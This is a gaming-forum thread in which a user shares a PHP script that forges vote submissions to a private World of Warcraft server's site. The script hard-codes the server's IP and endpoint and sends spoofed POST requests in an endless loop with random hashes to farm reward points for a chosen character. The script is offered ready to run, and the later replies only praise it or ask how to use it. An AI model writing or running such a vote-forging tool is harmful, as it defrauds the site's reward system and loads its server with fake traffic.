| | Emulator Server Exploits/Bugs Post your exploits for emulated servers here
[NO QUESTIONS HERE] [NO EXPLOITS FOR LIVE HERE] |  | 
2 Weeks Ago
| | Master Sergeant | | | Join Date: Mar 2008 Location: root
Posts: 100
Reputation: 41 Level up: 30%, 567 Points needed |    | | undamed-wow vote for fun:D i find that old file into my pc and i want to share it still works btw 
u need latest php to run this(local) Code: http://www.mediafire.com/?qtywt3mtwne
PHP Code:
//coded by Karapidiola from mMowned:D
<?php
function Banner(){
echo("FREE VOTES www.undamed-wow.com :D\n");
}
function HasHMaker(){
$char_set = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n',
'o','p','q','r','s','t','u','v','x','w','y','z','1','2','3','4','5','6',
'7','8','9','0');
$hash_set = "";
//start the RandomHashing ...
for($i = 0; $i < 32; $i++){
$hash_set.= $char_set[rand(0,(count($char_set)-1))];
}
return $hash_set;
}
function DoGayVote($realm,$char){
$host = "174.120.89.74";
$port = 80;
$packet = "POST /getpoint.php HTTP/1.1\r\nAccept: */*\r\nReferer: http://www.undamed-wow.com/dovote.html\r\n";
$packet.= "Accept-Language: el\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Accept-Encoding: gzip, deflate\r\n";
$packet.= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\n";
$packet.= "Host: www.undamed-wow.com\r\n";
while(1){
$b = "url=".HasHMaker()."&realm=".$realm."&char=".$char."&code=DHGK&checkCode=DHGK&button=Vote+Now";
echo("$b"." \n");
$sck = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
if($sck === false){
echo("[] Socket Failed!\n");
}else{
if((socket_connect($sck,$host,$port)) === true){
$total = $packet."Content-Length: ".strlen($b)."\r\n\r\n".$b;
socket_write($sck,$total,strlen($total));
}
}
sleep(3);
}
}
Banner();
echo("Enter The Realm Id :");
fscanf(STDIN,"%s",$_id);
echo("Enter Char Name :");
fscanf(STDIN,"%s",$s_id);
DoGayVote($_id,$s_id);
?> | Donate to remove ads, get your "DONATOR title, and get access to the MMOwned community's elite Shoutbawx. 
2 Weeks Ago
| | Corporal | | | Join Date: Feb 2008 Location: Playin muh dk
Posts: 28
Reputation: 5 Level up: 24%, 382 Points needed | | | Gawd I love these scripts. +2 rep
*sigh* need to spread it... sorry | 
2 Weeks Ago
| | Sergeant | | | Join Date: Feb 2008
Posts: 54
Reputation: 7 Level up: 97%, 16 Points needed |  | | | maybe more infos? How to use, for what etc.? | 
2 Weeks Ago
| | New User | | | Join Date: Aug 2009
Posts: 8
Nominated 1 Times in 1 Post Reputation: 1 Level up: 25%, 303 Points needed | | | | i would also like to know how this works | 
2 Weeks Ago
|  | Master Sergeant | | | Join Date: Apr 2009
Posts: 75
Reputation: 6 Level up: 49%, 257 Points needed |  | | | lol trying to get some post
__________________ http://www.mapmodnews.com/images/library/image/CoD-MW2-Wallpaper.jpg |  |
Posting Rules
| You may not post new threads You may not post replies You may not post attachments You may not edit your posts HTML code is Off | | | All times are GMT -4. The time now is 06:34 PM. |